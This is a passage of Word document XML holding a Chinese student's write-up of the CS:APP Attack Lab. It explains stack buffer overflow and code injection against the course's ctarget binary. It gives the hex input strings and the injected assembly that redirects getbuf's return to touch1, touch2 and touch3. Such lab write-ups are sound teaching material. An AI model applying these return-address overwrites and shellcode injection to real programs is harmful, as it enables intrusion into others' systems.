          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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所以我们只需要输入48个字节，前四十个字节填满getbuf开辟的40大小的空间，后八个用来储存touch1的地址，这样，在ret时，就会弹出touch1的地址并且跳转到那里去。</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为防止前四十个字节内容产生影响，我们将前面的字节全都设为00</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于是输入为</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00 00 00 00 00 00 00 00</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00 00 00 00 00 00 00 00</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00 00 00 00 00 00 00 00</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00 00 00 00 00 00 00 00</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00 00 00 00 00 00 00 00</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b1 18 40 00 00 00 00 00</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这里要注意是小端输入，所以输入时顺序需要翻转。</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然后使用HEX2RAW来生成注入的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6109970" cy="277495"/>
            <wp:effectExtent l="0" t="0" r="11430"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6109970" cy="277495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Level2:</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Phase2要求我们调用touch2函数，同时把cookie的值传递给touch2，根据题目所给提示，函数的第一个参数是在寄存器%rdi中传递的，cookie的值需要在%rdi中传递。</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因为题目限制不能使用jmp和call语句，所以我们要跳转仍然需要通过ret来进行操作。</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首先来查看cookie的值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x4dae86d7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6218555" cy="298450"/>
            <wp:effectExtent l="0" t="0" r="4445"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6218555" cy="298450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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再看看touch2的地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x4018e5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6215380" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="762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6215380" cy="381000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在 x86 架构中，ret 指令的工作原理如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从堆栈顶部弹出返回地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将返回地址加载到程序计数器（PC）中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>控制流跳转到返回地址，继续执行调用该函数的地方。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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那么我们只需要像phase1一样，在ret处覆盖上我们注入代码的地址，这样ret就会跳转到我们注入的代码，而因为cookie的值需要在%rdi中传递，传递完之后就可以跳转到touch2，所以还需要通过push压入touch2的地址，在ret时弹出，就会跳转至touch2处。</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所以我们需要执行的代码为</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mov $0x4dae86d7, %rdi</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push $0x4018e5</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 xml:space="preserve">ret </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通过unix&gt; gcc -c example.s</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unix&gt; objdump -d example.o &gt; example.d指令生成机器码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6144895" cy="1250950"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
            <wp:docPr id="6" name="图片 6" descr="屏幕截图 2023-11-20 11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3-11-20 112353"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6144895" cy="1250950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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目前还需要寻找注入代码的存放地址，由于注入代码需要放到栈内，我们可以通过gdb调试指令来查找栈顶地址，将注入代码放在该地址即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6195695" cy="3644900"/>
            <wp:effectExtent l="0" t="0" r="1905"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6195695" cy="3644900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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可以看见%rsp地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x55681f08</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所以phase2的输入为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>48 c7 c7 d7 86 ae 4d 68</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e5 18 40 00 c3 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//注入的代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>08 1f 68 55 00 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//返回注入代码地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Level3:</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Phase3要求为栈中覆盖指定信息，需要我们将cookie作为字符串传递给touch3并且跳转到touch3。</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根据提示，当调用函数hexmatch和strncmp时，它们将数据推入堆栈，覆盖getbuf使用的缓冲区的内存部分。因此，需要小心放置cookie的字符串表示形式的位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先，根据cookie值转换成ascii码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>34 64 61 65 38 36 64 37</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然后来查看提示里面提到的hexmatch以及touch3</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5895340" cy="1735455"/>
            <wp:effectExtent l="0" t="0" r="10160" b="44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5895340" cy="1735455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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这里使用了random，所以s说随机的，有可能会覆盖掉我们储存在栈内的字符串，所以字符串需要储存在一个安全的地址，我们可以考虑一开始就出现的test函数：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6169025" cy="1766570"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1143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6169025" cy="1766570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6182995" cy="349250"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6182995" cy="349250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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同phase2，我们找到了test的栈顶地址用来储存我们的cookie值，地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x55681f38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。然后查看touch3的地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x4019fe</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="311150"/>
            <wp:effectExtent l="0" t="0" r="0"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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6172200" cy="311150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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所以本题的汇编代码以及对应编码为：</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6170295" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="1905"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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6170295" cy="1333500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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此代码将cookie的值四个字节一次地赋值给0x55681f38以及后续偏移地址，然后根据题目提示加上00作为结尾，最后压入touch3的地址来最后弹出跳转。其他思路同phase2。</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所以最后的机器码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2273300" cy="1289050"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2273300" cy="1289050"/>
                    </a:xfrm>
